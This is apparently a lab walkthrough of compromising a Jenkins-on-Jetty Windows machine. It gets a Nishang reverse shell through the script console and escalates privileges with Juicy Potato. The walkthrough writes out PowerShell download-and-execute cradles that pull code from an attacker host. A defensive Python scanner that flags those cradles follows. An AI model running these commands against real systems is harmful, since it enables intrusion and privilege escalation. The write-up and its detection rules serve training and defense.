Quickly running gobuster against the Jetty server shows that we have a directory to check out.
Going there we see Jenkins!
It turns out we have command execution through the script console without needing to be logged in, which works in our favor.
Initial Access
Using Nishang's Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box.
First we want to copy the example invocation to the bottom of the script so that it runs as soon as the script is loaded on the machine we are attacking.
Next we want to get a web server running and a netcat listener to catch the reverse shell. In this case I am using updog for my simple web server.
Using the script console again, I run this command to download and execute the Invoke-PowerShellTcp reverse shell script.
And we get a shell back!
This allows us to get user.txt!
Privilege Escalation
Juicy Potato
Next we want to run PowerUp.ps1; however, we want to use the dev branch, as it has extra checks.
Then we want to run these commands in our reverse shell:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.92/PowerUp.ps1') # Load PowerUp.ps1 into memory from our web server
Invoke-AllChecks # This runs the PowerUp function that checks everything
Right away we see SeImpersonatePrivilege, which means this box is vulnerable to Juicy Potato!
We first need to download JuicyPotato.exe to the box, which I am hosting from my Kali box.
We also need to copy Kali's nc.exe to the Windows box:
# nc.exe is located at /usr/share/windows-resources/binaries/nc.exe on Kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe" # Fetch nc.exe from our web server into the current directory
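As an added example that is not part of the original walkthrough, here is the detection side of the two download cradles used above: a small Python scanner that runs over constructed PowerShell Script Block Logging (Event ID 4104) entries and flags the IEX/WebClient cradle, Invoke-WebRequest -OutFile fetches, and the tool names that appear in this writeup. The sample log entries and rule names are constructed for the example and assume script block logging is enabled on the host.

```python
import re

# Constructed sample Script Block Logging (Event ID 4104) script text,
# modelled on the commands run in this walkthrough. Not real log data.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.92/PowerUp.ps1')",
    "Invoke-AllChecks",
    'Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"',
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",  # benign admin activity
    "iex (new-object net.webclient).downloadstring('http://10.10.14.92/Invoke-PowerShellTcp.ps1')",
]

# Detection rules: (name, regex). Case-insensitive because PowerShell is.
RULES = [
    ("download_cradle_iex",
     re.compile(r"\biex\b.*new-object\s+(system\.)?net\.webclient.*\.downloadstring\(", re.I)),
    ("webclient_download_string",
     re.compile(r"new-object\s+(system\.)?net\.webclient.*\.downloadstring\(", re.I)),
    ("remote_file_fetch_to_disk",
     re.compile(r"invoke-webrequest\b.*\s-outfile\s", re.I)),
    ("known_tool_name",
     re.compile(r"(powerup\.ps1|invoke-allchecks|invoke-powershelltcp|juicypotato\.exe|nc\.exe)", re.I)),
]


def scan_script_block(text):
    """Return the names of every rule that matches a single script block."""
    return [name for name, rx in RULES if rx.search(text)]


def scan_all(blocks):
    """Return (index, text, matched_rules) for each block that trips at least one rule."""
    hits = []
    for i, block in enumerate(blocks):
        matched = scan_script_block(block)
        if matched:
            hits.append((i, block, matched))
    return hits


if __name__ == "__main__":
    for idx, block, names in scan_all(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{idx}] {', '.join(names)}: {block}")
```

On a real host the same rules can be applied to the ScriptBlockText field of 4104 events; the benign Get-ChildItem entry shows that ordinary administration does not trip them.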